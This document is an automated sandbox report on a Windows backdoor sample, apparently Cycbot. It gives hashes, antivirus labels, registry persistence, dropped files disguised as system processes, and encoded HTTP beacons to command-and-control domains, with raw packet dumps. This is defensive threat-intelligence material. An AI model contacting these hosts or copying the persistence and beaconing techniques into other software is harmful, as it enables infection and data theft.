Analysis Date2014-11-04 08:48:11
MD5e2b85c366ed845e50fab944a9b723c5b
SHA150b90656cb795f0070fbc3162741c51277b33659

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 20727e9121a04c994a4cce9a332918b3 sha1: 787535aff032c059ac56cc3403ea9567f4ad4c42 size: 173568
Section.rdata md5: 13ad0f523e7956c3b2cccdc443808df3 sha1: e2a9d11acf0fd47a3ffff5f85899d11dcfb16804 size: 3072
Section.data md5: d1c89b0ba5158a0475f10a3e337487ed sha1: c4130d8106fdd734f26b600859faef18fafbd9fe size: 14336
Section.lib md5: 7be3c3ac7408336f709f8744f1160fcf sha1: 93a03740a5bf1cdaa55ac6a021d3da640759ff58 size: 512
Timestamp2005-10-03 10:33:35
VersionPrivateBuild: 1589
PEhash91d2564f4bc04112742efdf09c08262208bd9a6e
IMPhash4c1a0e3ddc35af3d28ed09ad86f4a69f
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12685.psa
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-3022
AVDr. WebBackDoor.Gbot.17
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KTW
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVIkarusTrojan-Spy.Win32.Zbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanGen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSfreemaildotaccess.com
Winsock DNSzoneom.com
Winsock DNSremotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSremotesupportsystem.com
Type: A
69.13.210.253
DNSzonetf.com
Type: A
141.8.225.80
DNSzoneom.com
Type: A
50.63.202.40
DNSfreemaildotaccess.com
Type: A
HTTP GEThttp://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKydrsuFZGucXFOpnrTuVq8ElEQgKx6UYBWY8CMLrkd1Yb7PqFeFtNU6IPYNv9nbZBPE1kJzYuIY6OS4j9PogfgV6qxIpJSoEDCB8YNDKrZOmm7t6bPgWnHelcDagfiGBOYV7mBGok2eDrd0XmFz3uycwu1K8FA64r5KYYNBaiHQ4lhYinarr8IXDowhlEUORjMo90Y%2BIq1tvbueDm1QaZyYGSblDkFJ0861RELEaHn8PWtQir%2FptNYlhzfg%2Bs8zK%2Bq78ONc4%2FHFAeG1o%2Bf%2BKfhJ8Vja%2FmgV5zFBlbHNKc6Qp7gV7m%2BXbZ2J%2F%2BQasYa2qhyQ2yhf4kqm01j5EtE9GB%2BvS3OovLRfGRavWdCaqg%2FOIT4osZY31giCdIEMuHuWzMkmtiSHIXhRNeHqZzjNO9JKI4aOTTZlbX59kK7t7T22sf3I1CMI7icQ8R63F55Tk9B9hdiUpapFLbxJnQ8viVCbfZJPr%2F2p4EjtNjyF72gGTdd1WjbKtfkzbZycvu5u%2B2IWQjQHasDCssiVsFQhDIqhWZbo4OqqeZX%2BT
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zoneom.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvEi3ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: opera/8.11
Flows TCP192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 50.63.202.40:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 72737375   GET /images/rssu
0x00000010 (00016)   6e695f73 6d616c6c 2e676966 3f74713d   ni_small.gif?tq=
0x00000020 (00032)   67503461 4b796472 7375465a 47756358   gP4aKydrsuFZGucX
0x00000030 (00048)   464f706e 72547556 7138456c 4551674b   FOpnrTuVq8ElEQgK
0x00000040 (00064)   78365559 42575938 434d4c72 6b643159   x6UYBWY8CMLrkd1Y
0x00000050 (00080)   62375071 46654674 4e553649 50594e76   b7PqFeFtNU6IPYNv
0x00000060 (00096)   396e625a 42504531 6b4a7a59 75495936   9nbZBPE1kJzYuIY6
0x00000070 (00112)   4f53346a 39506f67 66675636 71784970   OS4j9PogfgV6qxIp
0x00000080 (00128)   4a536f45 44434238 594e444b 725a4f6d   JSoEDCB8YNDKrZOm
0x00000090 (00144)   6d377436 62506757 6e48656c 63446167   m7t6bPgWnHelcDag
0x000000a0 (00160)   66694742 4f595637 6d42476f 6b326544   fiGBOYV7mBGok2eD
0x000000b0 (00176)   72643058 6d467a33 75796377 75314b38   rd0XmFz3uycwu1K8
0x000000c0 (00192)   46413634 72354b59 594e4261 69485134   FA64r5KYYNBaiHQ4
0x000000d0 (00208)   6c685969 6e617272 38495844 6f77686c   lhYinarr8IXDowhl
0x000000e0 (00224)   45554f52 6a4d6f39 30592532 42497131   EUORjMo90Y%2BIq1
0x000000f0 (00240)   74766275 65446d31 51615a79 59475362   tvbueDm1QaZyYGSb
0x00000100 (00256)   6c446b46 4a303836 3152454c 4561486e   lDkFJ0861RELEaHn
0x00000110 (00272)   38505774 51697225 32467074 4e596c68   8PWtQir%2FptNYlh
0x00000120 (00288)   7a666725 32427338 7a4b2532 42713738   zfg%2Bs8zK%2Bq78
0x00000130 (00304)   4f4e6334 25324648 46416547 316f2532   ONc4%2FHFAeG1o%2
0x00000140 (00320)   42662532 424b6668 4a38566a 61253246   Bf%2BKfhJ8Vja%2F
0x00000150 (00336)   6d675635 7a46426c 62484e4b 63365170   mgV5zFBlbHNKc6Qp
0x00000160 (00352)   37675637 6d253242 58625a32 4a253246   7gV7m%2BXbZ2J%2F
0x00000170 (00368)   25324251 61735961 32716879 51327968   %2BQasYa2qhyQ2yh
0x00000180 (00384)   66346b71 6d30316a 35457445 39474225   f4kqm01j5EtE9GB%
0x00000190 (00400)   32427653 334f6f76 4c526647 52617657   2BvS3OovLRfGRavW
0x000001a0 (00416)   64436171 67253246 4f495434 6f735a59   dCaqg%2FOIT4osZY
0x000001b0 (00432)   33316769 43644945 4d754875 577a4d6b   31giCdIEMuHuWzMk
0x000001c0 (00448)   6d746953 48495868 524e6548 715a7a6a   mtiSHIXhRNeHqZzj
0x000001d0 (00464)   4e4f394a 4b493461 4f54545a 6c625835   NO9JKI4aOTTZlbX5
0x000001e0 (00480)   396b4b37 74375432 32736633 4931434d   9kK7t7T22sf3I1CM
0x000001f0 (00496)   49376963 51385236 33463535 546b3942   I7icQ8R63F55Tk9B
0x00000200 (00512)   39686469 55706170 464c6278 4a6e5138   9hdiUpapFLbxJnQ8
0x00000210 (00528)   76695643 62665a4a 50722532 46327034   viVCbfZJPr%2F2p4
0x00000220 (00544)   456a744e 6a794637 32674754 64643157   EjtNjyF72gGTdd1W
0x00000230 (00560)   6a624b74 666b7a62 5a796376 75357525   jbKtfkzbZycvu5u%
0x00000240 (00576)   32423249 57516a51 48617344 43737369   2B2IWQjQHasDCssi
0x00000250 (00592)   56734651 68444971 68575a62 6f344f71   VsFQhDIqhWZbo4Oq
0x00000260 (00608)   71655a58 25324254 20485454 502f312e   qeZX%2BT HTTP/1.
0x00000270 (00624)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000280 (00640)   6c6f7365 0d0a486f 73743a20 72656d6f   lose..Host: remo
0x00000290 (00656)   74657375 70706f72 74737973 74656d2e   tesupportsystem.
0x000002a0 (00672)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000002b0 (00688)   0d0a5573 65722d41 67656e74 3a206f70   ..User-Agent: op
0x000002c0 (00704)   6572612f 382e3131 0d0a0d0a            era/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a373220   on: close....72 
0x00000150 (00336)   36623634 33313539 20202078 36555942   6b643159   x6UYB
0x00000160 (00352)   57593843 4d4c726b 6431590a            WY8CMLrkd1Y.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a39 20202078 36555942   ose....9   x6UYB
0x00000160 (00352)   57593843 4d4c726b 6431590a            WY8CMLrkd1Y.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a484e4b 63365170   close....HNKc6Qp
0x00000160 (00352)   37675637 6d253242 58625a32 4a253246   7gV7m%2BXbZ2J%2F
0x00000170 (00368)   25324251 61735961 32716879 51327968   %2BQasYa2qhyQ2yh
0x00000180 (00384)   66346b71 6d30316a 35457445 39474225   f4kqm01j5EtE9GB%
0x00000190 (00400)   32427653 334f6f76 4c526647 52617657   2BvS3OovLRfGRavW
0x000001a0 (00416)   64436171 67253246 4f495434 6f735a59   dCaqg%2FOIT4osZY
0x000001b0 (00432)   33316769 43644945 4d754875 577a4d6b   31giCdIEMuHuWzMk
0x000001c0 (00448)   6d746953 48495868 524e6548 715a7a6a   mtiSHIXhRNeHqZzj
0x000001d0 (00464)   4e4f394a 4b493461 4f54545a 6c625835   NO9JKI4aOTTZlbX5
0x000001e0 (00480)   396b4b37 74375432 32736633 4931434d   9kK7t7T22sf3I1CM
0x000001f0 (00496)   49376963 51385236 33463535 546b3942   I7icQ8R63F55Tk9B
0x00000200 (00512)   39686469 55706170 464c6278 4a6e5138   9hdiUpapFLbxJnQ8
0x00000210 (00528)   76695643 62665a4a 50722532 46327034   viVCbfZJPr%2F2p4
0x00000220 (00544)   456a744e 6a794637 32674754 64643157   EjtNjyF72gGTdd1W
0x00000230 (00560)   6a624b74 666b7a62 5a796376 75357525   jbKtfkzbZycvu5u%
0x00000240 (00576)   32423249 57516a51 48617344 43737369   2B2IWQjQHasDCssi
0x00000250 (00592)   56734651 68444971 68575a62 6f344f71   VsFQhDIqhWZbo4Oq
0x00000260 (00608)   71655a58 25324254 20485454 502f312e   qeZX%2BT HTTP/1.
0x00000270 (00624)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000280 (00640)   6c6f7365 0d0a486f 73743a20 72656d6f   lose..Host: remo
0x00000290 (00656)   74657375 70706f72 74737973 74656d2e   tesupportsystem.
0x000002a0 (00672)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000002b0 (00688)   0d0a5573 65722d41 67656e74 3a206f70   ..User-Agent: op
0x000002c0 (00704)   6572612f 382e3131 0d0a0d0a            era/8.11....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427645 6933656a 62777667 53393137   fBvEi3ejbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656f6d2e 636f6d0d   ost: zoneom.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206f70 6572612f   er-Agent: opera/
0x000000a0 (00160)   382e3131 0d0a0d0a 3c746974 6c653e0a   8.11....<title>.
0x000000b0 (00176)   20202020 20205765 6c636f6d 65210a20         Welcome!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 656e6774 683a2030   </html>.ength: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a39 20202078 36555942   ose....9   x6UYB
0x00000160 (00352)   57593843 4d4c726b 6431590a            WY8CMLrkd1Y.


Strings
U
.
040904b0
1589
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2v5@TK;
4Js>%^
5K8V5m8
{8lN*]
8rLc(iP9
9b8|oG
AnimatePalette
B##3YJ
CallNextHookEx
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiber
CreateFontIndirectA
CreateILockBytesOnHGlobal
CreatePen
CreateStreamOnHGlobal
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
EmptyClipboard
EnumResourceNamesW
Ep^R4^-
ExtCreatePen
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlattenPath
FlushFileBuffers
GDI32.dll
GetBitmapBits
GetBkColor
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetPath
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
Ie2mB#&:
i;H+|4#
IHZYUU
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
{JCN#q|
=JCw~z
j,]gXy
jj.z?0
JRichu
<jz\;#
JZ.nmD
KERNEL32.dll
l.N8Ob
LocalAlloc
LockFile
)~L$?W
MonitorFromWindow
NdrClientCall
n*h+D1(
;]=oHR
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
?oLj4%
-=ow6u
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
|PiP*d1
PlgBlt
PolyBezier
ProgIDFromCLSID
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
RoundRect
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetCommConfig
SetDIBits
SetEndOfFile
SetScrollRange
SetStretchBltMode
SetTextColor
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
StrokePath
t?d	wC
!This program cannot be run in DOS mode.
ToAscii
	/T^OB
tzX5-p
};u,6%
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
/V~?LA
+vqCH[
WI}5tA
WinHelpW
WW\o:^
X^*xO-
&&-@|`y
ylj6|+k
ymO%ncz:
z4YL>1
<ZkL)J
zN?u{7
].^Z)U